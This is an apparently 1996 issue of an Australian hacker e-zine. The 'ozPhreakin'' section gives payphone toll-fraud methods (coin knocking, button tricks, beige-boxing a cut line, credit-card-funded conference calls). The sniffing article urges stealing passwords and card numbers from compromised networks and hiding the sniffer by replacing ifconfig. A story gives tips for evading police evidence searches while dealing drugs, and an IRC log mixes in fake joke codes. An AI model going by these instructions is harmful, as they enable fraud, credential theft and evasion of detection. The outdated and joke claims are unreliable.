-= Other Info =- If you have Internet access, then you can do searches for frequency lists. Just use InfoSeek or something similar. Here are some scanner links that might be of interest: Links to scanner related pages - http://www.li.net/~j4dice/links.html TBSA Frequency Guide - http://www.tbsa.com.au/locvic.html Stoopid Scanner Tricks - http://exo.com/~rbarron/ Glen's Links - http://www.geocities.com/SiliconValley/5019/ Also check out the TBSA Frequency guide FTP site: ftp.tbsa.com.au /pub/scan I also have in my possession a program that can be used to decode pager tones. It's called POCSAG Decoder (PD-201.zip) and can operate off scanners and the like, once a small circuit has been built. So far I have be successful in getting it to work with pagers made by Link Telecommunications. Telstra pagers don't seem to work. I think they use a different system called GOLAY. Anyway, if you would like a copy of this (or have some ideas etc) send me some mail. I originally found it somewhere on the Internet, so search there as well. Maybe a newer version will be out. How to contact me... Myst (vk3hax) - darrin@lin.cbl.com.au (Will be down sometime September 1996) - robinson@smbadm.ballarat.edu.au after September (include my alias at top) Or on IRC (usually only OzNet) under the name Myst, Mystik or Magik. ._________________________________________________________________________. -= ozPhreakin' - aCiD XTReMe - August '96 -= Revision 3.1 Catch me on #SeCuRiTY! in OZNET This text is only to be used as an informative document. I do not encourage these activities at all, nor will I accept any responsibility in any circumstances where the below techniques are practised. The phreaking scene is nearly dead in Oz, all the yankie hype of blueboxing and redboxing is all bullshit. Telstra having an overly advanced fone system isn't helpin' us either. But never say never, there is always some way to break the fone Xchange. Just look at AT&T, some bigshots they are, scoopin' in $$$ every day, and still they have faults in their system. Can't blame 'em tho, nobodys perfect, no matter how stinkin' rich ya are. -=-=-=-=- Be vewwy careful. Telstra is watching you. With their ESS system (electronic switching system), Telstra is able to log every call you make. Even 1800 and operator assisted numbers. I suggest, if you do try Phreakin' (I do not encourage this activity) do it very carefully, by not using your own fone or friends/relatives. Do not repeatedly call a single place in such a short time and do not leave any names, addresses or numbers. All of this must be common sence for you, this is just a friendly warning. -=-=-=-=- Freecalls. COCOT's seem to be an easy target for phreakers these days, as they are poorly made, and telstra don't really give a rats ass about them, after all, they still are getting the money, even if people are phreakin' them. What is a COCOT? I'm glad you asked. It stands for Customer Owned Coin Operated Telephone. Telstra has released many models of these little beauties. The crude, yet effective way of gettin' free calls off these babies is just brutal force. Firstly pointed out to me by a friend of mine, he simply hit the machine to get his 40c call. As it seems, the architecture of the fone itself has a tiny flaw, which is that coins can simply be knocked out of the box and into your hand. Knock it a few times and you get enough to buy yourself a scratchy and hopefully win yourself enough cash to get a mobile fone. Oh, just in case youre wondering, the fone I was talkin' about is the goldfone released by telstra. The one with the 'folow on' button on it. This way is quite brutal, and may attract attention. Also, the payfone is hired by shops to make money. Abuse the privelages of free calls and you might find a disgruntled shopkeeper with a $1000 fone bill take away the fone, leaving you stranded. At the current version of this document this technique still works. A technique that I have known about for a while now (but have not yet perfected) is the 'follow on' trick. Find yourself a gold fone and make sure nobody else is lookin' at ya. Now, grab the reciever and listen in for the dial tone. Hold down the follow up button and slam down the reciever, then pick up the reciever while still holding down the button, and dial away. Another technique that has been known to work goes back to the COCOTs. If you look around, you could find yourself a COCOT which is not sold by telstra. These are usually poorly made thingoes that are available to the public from Dick Smith for a few hundred bucks and can be plugged into any fone socket. You can usually find these at pubs and newsagencies. One trick you can do is just trace the fone line to the socket in the wall, whip out your beige box, and connect it to that. Most cases the line is hidden behind something, so you could just cut the line and use that to beige box. A technique that has only worked once for me is using a tone dialer on them. Dial up a 1800 number which will be free, and get the person on the other side to hangup. The fone will reset itself and go back to the dial tone. The keypad is now still disabled so you just whip out the tne dialer and dial away. Get yourself a fone number to any payfone, dial it using a mobile or whatever, then pick up the reciever of the fone you dialed. Hang up the other end and then whip out your tone dialer. You may relise that the touch pad is disabled, so then flick the hook once, and it should hang up the line. The fone resets itself, so you use the tone dialer to dial the number you want. This trick works great if you know the number to any box that is close to another one. All you spend is 40c for the call, and you get yourself free STD/0055/IDD calls. You can also get some numbers that dial your number back. Useful to boxes that aren't close to others. -=-=-=-=- 1800's Free calls are a fun thing to do, even more fun when they're totally legal. This is where the 1800 Xchange comes in. Once known as 008 numbers, these are free to the caller from a home fone or a payfone. Scanning these numbers may get you some juicy connections. A data line, fax line, international line or even an adult service line. Adult services. You may think these numbers are perverted, or you may think they are the best thing since sliced bread, but they have many other applications for a fone phreak to use. Call one up and use a credit card number (I'm sure U know what I'm hinting at here) now get someone you know to call it and do the same. You now have yourself a conference line. Ask nicely if the fone sex chic could just let you talk to your friends. She shouldn't mind as she is getting paid for all that, but others who you dont know may be in the room at the same time, so pay some respect to these women and do wat they say. More next issue! .____________________________________________________________________________. .___________________.._____..__________________. | #SECURiTY LaME & WIERD QU0TES | | ASSEMBLED BY THE CLD CREW | '______________________________________________' does anyone know how to phreak in australia? i have been trying but have had no luck duh! * TWILIGHT is rolling on the floor, laughing at dude until he just about pukes! next dumb question anyone have any tips? > anyone have any CC#'s ... h0h0h0h0h0 anyone got any warez sites :> yeah dude.. find one of those pits in the ground (not the ones with a T on it.. thats not what youre looking for) and go in, and play with the cables. the think ones are phone lines once in there, you plug in your phone, and free calls haha no seriously i am its called pitting its a phreaking technique he is the ones marked as telstra are actually power supplies. the other ones actually contain the phone cables im gonna have to do some serious link chasing nem the page will be found! another one.......walk upto some dude, belt him around the head, take his mobile and use it till it ties :> shhh dking! dont tell him our techniques > ties ... i have not tried that ;) acidx: sorry man just tryig to be helpful good site for info http://www.sentry.afp.gov.au/~phreak to get free calls on normal payfones, dial 0002663##**#5571##* dont tell him all our secrets acidx telstra wil never be able to block that technique nems *dude* thanks for the help unless they change every hardware in australia, that technique will work unreal! thanks 0002663 will enable the linesman operating system have to type it in really fast or it wont work ##**# will get it to test a phone connection, so you put in any number you want to call, and 5571 is the code, op asst will initialise the connection, and ##*. well, dunno what that does how long do you have to hold in the op assitant button hold itfor about 5 secs maybe 6.. oh dking do you have another site that one doesn't work! its totally untraceable too. as ESS does not log it as a call call anyone, theres absolutely no way (unless someone is testing the line at he time) to find out who you call and where works for all numbers too even overseas? and international? ummmmmm maybe its without the www...yeah i think the afp just use http://sentry.afp.gov.au/~phreak hell yes, even on the moon *ROFL* no doesn't work either oh dking, that site doesnt work either ;> [ed note: as u can see, dudes IQ spands that of a retarted KUA member. LOL. Very few of the techniques described here would even work, & http://sentry.afp.gov.au/~phreak. wot kinda fool would be dat lame? h0h0h0] that'll attract the feds like moths to a flame is there any books on hacking? the does superuser mean? what program do you use to hack pc's how do you get the number of the other pc so warez is copied files? can i have ops? if ya dont know what to do in a unix sys mind DONT TRY TO HACK IT .me is from oz.. DOH! feds are pussy's *** ssnake changes topic to "Absolutely >NO< illegal activity going on in here, so piss off!" * Reaper killed millions of aliens in ufo's by farting on an ant hill!.. ne1 here know about ozemail tightening up the security? fedz are on Ozemail i really wanna learn something does anyone know how to phreak in australia? i have been trying but have had no luck what is the root account? what does @ next to your alias mean? so who are telstra again? *** BlackHaze changes topic to "Morphin back at ya wiff 0-day kardin' k0d3z#!@ wh00t#@!" DeM k0DEz /\Re k0MinG T|-|Ru PGPfone? Don't think zimmerman programmed that one did he? Hello fellow hackers! i'm not lame you are! what is lag? what is +tn on the top of the window mean? <|-XYZ-|> who has something to trade 4 a T1 hacking site?? shaman: #hacking is soon to be shut down by ircops.... The meaning of "hacker" has been twisted by the media Is it true that the US government forced the D00d who write PGP to write a backdoor into the latest international versions? [Ed: We at CLD can verify the existment of the pgp backdoor ;> ] pinz: he must have hacked root on machine to create account or are they non unix machines... thats a major feat in itself <{_DeV_}> yeah, hacking away the bricks.... i am the hacker of hackers Sage: oh, da haqrz of all haqrz... hhehe. spew forth your knowledge graduated from SAS swat team 2 yrs ago [Ed: Sage said to me that for graduating from SAS, me managed to steal 7, thats right, seven waterpistols!!] .____________________________________________________________________________. -= The Basics of Sniffing -= By MiNDWaRP Intro ~~~~~ Well this is my first article for CLD, so I will try to make it as good as possible. For those ppl who don't know me my name's MiNDWaRP and you can occasionally find me on #security on IRC. Other than that you can mail me through KaosNet or DaemonNet. This issues article is to do with sniffing. How to gain heaps of information not meant for you by spying on ethernet packets. Uses could include spying on email thru to gaining credit card numbers/account numbers. However you must have root axs on a networked computer before you can do this. This article will not detail how to get root, but it will tell you the basics of what sniffing is, programs you need to do it, some common sense advice when it comes to sniffing, and some source code you can compile... Greetz ~~~~~~ Greetz go to Grim, TPV, Void, AciDX, and everyone else in the scene. Fuq offs ~~~~~~~~~ Fuq offs go to the eternally pathetic Pierre Thorand, and all the try-hard lamer anarchists who do nothing but talk.. if your so good why don't you prove it... The basics of sniffing ~~~~~~~~~~~~~~~~~~~~~~ Computer networks today, unlike telephone sytems, rely upon computers sharing information rather than individual connections to a central mainframe. This means that a computer connected to a network is capable of recieving information that was meant for another computer. Capturing the information as is passes through the network is known as sniffing. Nowadays the most "popular" way of connecting pc's is through the ethernet. For those who don't understand how the ethernet works i will briefly describe it for you. The ethernet protocol works by sending small "packets" of info to all machines/pc's on the same network. Contained within the packet is what is known as a packet header. This header contains the address of the destination machine. Supposedly (yeah right.. ;) only the machine with the matching address is meant to recieve the packet. A machine that accepts all packets is said to be in promiscuous mode.. In a normal networking environment, account and password information is passed along in clear-text, making it relatively easy for someone, once they have gained root axs on a machine, to put it into promiscuous mode, and by sniffing, "compromise" all the machines in the network. HOw do i do it..? ~~~~~~~~~~~~~~~~~ Well, the primary way us hackers compromise these ethernet packets by sniffing is through the use of groovy little progs. One such program is called esniff.c which is for use on Unix systems. However there is a variety of sniffers available, both freeware and commercial for most O/S. Network Sniffers ~~~~~~~~~~~~~~~~ * Snoop on Solaris 2.x, also works on SunOS 4.1 - ftp.playground.sun.com * Packetman - ftp.cs.curtin.edu.au:/pub/netman/[sun4c|dec-mips |sgi|alpha|solaris2]/packetman-1.1.tar.Z <-(haven't checked this out) * Esniff.c - ftp.coombs.anu.edu.au:/pub/net/log Dos based sniffers ~~~~~~~~~~~~~~~~~~ * Ethdump v1.03 - ftp.germany.eu.net:/pub/networking/inet/ethernet /ethdp103.zip * Ethload v1.04 - companion util for use with an ethernet monitor - ftp.germany.eu.net:/pub/networking/monitoring/ethload/ethld104.zip These are not the only sniffers available, there are commercial ones available, but who is going to PAY for one of these...? There are also many sniffers comming out recently which are available at most good hacking web sites. Advice when using a sniffer ~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. A method used by sysadmins to detect a sniffer that only collects data, and does not actually respond to any of the information, is to "physically" check all ethernet connections in a network. So if you are running a sniffer from a computer you have regular axs to, i.e. at work or school, but you have physically connected it to a network that it's not meant to be connected to it makes sense to disconnect it after you are finished. In other words minimise the time it is connected to minimise the risk of getting caught. 2. There is a command on some Unix systems which allows a sysadmin to check the status of all interfaces and whether or not they are in promiscuous mode. >ifconfig -a You should run this to see whether the sniffer you are using is detectable. By replacing the command "ifconfig" you will greatly reduce the chances of detection. 3. When you run a sniffer make sure you regularly check the log it creates, copy it if necessary, and delete it aftewards. This is due to the fact that if you run a sniffer on a heavily-utilised network the log becomes so large that all the file space is used up. Now obviously it would take a while to happen, but if you carelessly leave one running it is possible. .____________________________________________________________________________. DIsClAiMeR:The following story is ficticious and bears no resemblance to things that may or may not have happened to persons living ,dead or undead :> Getting Trashed By The Cops ~~~~~~~~~~~~~~~~~~~~~~~~~~~ I lived in a house with two other guys a drummer and loser we'll call them Chuck and Steve.We lived on a busy main road ,an had lots of friends droppin by ,to say hello an score.I probably moved an ounce or so a week in $50 bags to people we knew from school and other acquaintances,which was fine by me ,a few $$$ on the side an free smoko whenever I wanted it.Not so for Steve , he couldn't keep his side of things together,he'd constantly smoke more than he sold an eventually put himself out of business,ie no one would give him credit,so he couldn't deal.SO I inherit Steves 'dealerhip' which was pretty big,full of peolpe I didn't really know that well,but they had the cash an knew not to ask for credit.I started to move a LOT more dope , Steve was unemployed an at home all day and was able to handle the distribution during the day ,he'd was under strict orders of no credit to anyone an d would 'skim' off the top of the bags to keep himself in dope. Things were going along quite nicely ,I had a nice little earner on the side ,Steve was getting as bent as he wanted.Then things started to get a little odd,our garbage bin would move from where I left it,the side gate was sometimes open or ajar,I figured it was one of the guys being lazy or somethin ,I shrugged it off as my legit business was booming and I didnt have the time or the motivation to look into it. Things got worse, people I didn't know started knockin on the door an askin to score ,If Steve wasn't there to vouch for them I'd tell them to FUCK OFF,things were gettin a bit outta hand,upon quizzing Steve most of the people he could ID but some he didn't know ,he passed them off as friends of friends.This was not good, I was aware of what we were doing could get us into a lot of trouble ,Steve however didn't really give a fuck or understand what his actions could lead to.The dealing continued with me telling Steve to scale things down to a managable level.I might add that Chuck was cool an kept his part of the dealings in control.Steve didn't scale things down, the phone was ringin off the hook an people were comin an goin like crazy on weeknights (usually a quiet time)It was round then I quizzed the guys about the garbage bin an the side gate.They said they never used the gate and I was the one who had the garbage dutys..... It took a while for the penny to drop,so life went on, people who called in after 11pm on weeknights were greeted at the door by me an a pump action shotgun ,that problem soon stopped.Things were back to 'normal' a lotta comings an goings mostly Thur,Fri,Sat which was cool an the bin seemed to stop moving and the gate remained closed. It was a Tuesday night/Wednesday morning about 2.30am ,the doorbell rang an rang an rang till I woke up grabbed my rifle an answered the door(i was not in a good mood).There was a woman dressed in a local pub staff shirt asking if she could score? saying she'd heard she could score from here,I'd never seen here before and out on the street a late model Comodore was waiting for her ,I told her to FUCK OFF!She took the advise and left. The penny finally dropped ,the barmaid was an undercover COP,and the moving bin thing was the COPS TRASHIN US FOR EVIDENCE.FUCK! Next morning we had a meeting ,I declared the shop was SHUT.I didn't need the shit that happened last nite and stopped giving Steve product to sell an told him to spread the words to his 'friends'.New precautions were placed on the garbage,every night I'd pour sour milk or mouldy potato juice or anything else disgusting I could find over our garbage. About a week later I found 1/2 the contents of our garbage bin laying in our backyard.The bin was previously left out the front,I sorta felt sorry for the cop who went thru it ,as it was a particularly disgusting pile of rubbish, my guess was they got halfway thru and got sick ,suckers. Oh well time to move,that day I terminated the lease and within a fortnight was in a different house with different people . Some lessons learned, never throw out incriminating evidence with your hosehold waste(yeah even 'roasted' cigarette butts) it seems the cops have been trashin long b4 hackers existed.Sell only to who u know ,if I sold to the'barmaid' who knows what would've happened.It won't be your own stupidity that gets u busted ,it'll be someone else who fucks things up for you.Steve was STUPID he has since gone down for several posession and trafficking charges,once the cops know who u are they keep a close eye on you.If in doubt move out,its cheaper than a court case. -JET BLACK Catch me on #security on Oznet .___________________________________________________________________________ -= Java Security - Does Suns new language promise security on the Internet -= By CLD Staff -= Revision 1.2 Java. Yes, no doubt of the biggest media hype up concerning computer languages of all time. Many people believe that Java is just pretty multimedia purposes for on web pages. Infact this is defiantly not the case, more than half the digital community do not see the full potential of this exciting new language. To put simply Java is not another form of multimedia scripting/auothring rather programming for the Internet. It extends far beyond buttons, sounds, animations on the web, take the case that you had an Oracle database on a mainframe which did not support http capabilities you could write a Java applet to directly communicate with the server & pump out the data from the mainframe directly on the web with little hassle. Let's hope that people grasp this exciting new language as it looks as though Java will radically change the Internet as we know it today. With Java extending such large capabilities security issues becomes a concern. As a general rule of thumb, any data accessed over a network other than local is presumed 'untrusted' & the Java environment takes precautions that an applet cannot do malicious actions. Such as corrupting your system, opening network connections to untrusted sources, deleting files etc) Sun has realised this and in turn have focused much attention in addressing security related problems in the Java environment. But as always bugs are promenant in the security model & measures have to be taken to assure that malicious code won't be able to run Java Security Restrictions The Java Security model has some heavy restrictions on what a Java applet can and cannot do. Intermediate security options are available to allow an applet to run in an un-restricted environment and as Java gains it's foothole on the Internet Web clients will allow user control over these restrictions for applet's to open network connections to other hosts and more flexibility over the i/o disk functions on the local system etc. Generally speaking an applet loaded over a network other than local cannot have these current restrictions - Read/Write files on the local system - Open a network connection to other hosts, other than where the applet originated from - Check for the existence of a file on the local system - Listen for incoming network connections on any port on the local system - Call System.exit() or Runtime.exit() to force the Java client to exit - To create a SecurityManager/ClassLoader Object - Obtain user information, or obtain information about the following system properties user.home java.home user.name user.dir java.class.path - Access or load any other class, other than the standard eight java.awt java.lang java.net java.io java.applet java.awt.peer java.util java.awt.image - The malipulation of any other ThreadGroup other than its own - Call file.delete() to delete files on the local system or invoke rm or del - Call file.rename() to rename files on the local system or invoke mv or rename - Call File.mkdir() to create directors The Java application which runs the applet decides many of the above restriction if they are valid or not. If an applet is loaded from the local network many if not all of the above restrictions are lifted & the applet can usually run in a more or less un-restricted environment. The java.lang.SecurityManager controls which security operations are allowed under the current environment. Applet clients create a sub-class of the SecurityManager to implement what security policy it will use. A security policy is in place by calling System.setSecurityManager() an obvious security hole is in place, if untrusted code is loaded over the network & it implements it's own SecurityManager object the applet could run itself in it's own environment without any restrictions. Of course Sun has realised this huge problem & measures are in place for untrusted code not to load its own SecurityManager object. With the added security of the java.lang.ClassLoader, this class prevents an applet to replace the standard eight Java classes with their very own. Not only does the Java environment include tough measures in how classes are loaded over the network & what security measures are in place for the applet to run in a environment defined by the SecurityManager it also provides Byte-Code Verification where code is passed to insure that code cannot forge pointers to memory more cause strange things to happen in the running of the applet. Overall, Java's security is well structured but some important bugs need to be addressed before Sun can claim that Java's security is un-breakable. .____________________________________________________________________________. -= neXt iSSUE Well, we hope that this issue is up to standards as we have totally re-organized the way CLD works & the writers/editors involved.. Until next issue try desperatly to unite the scene & finally lift it off the ground as we feel that time has finally come.. neXt iSSUE... TCP/IP & it's structure The CLD crew will investigate bugs behind linux & write some ka0s k00l code. More Aussie Phreaking Techniques More News, Java fakemail applets... & Much more. .____________________________________________________________________________. CYBERLABS DiGiTAL iSSUE 4 bhaze@fl.net.au diceman@fl.net.au sydney.oz.org - #security EOF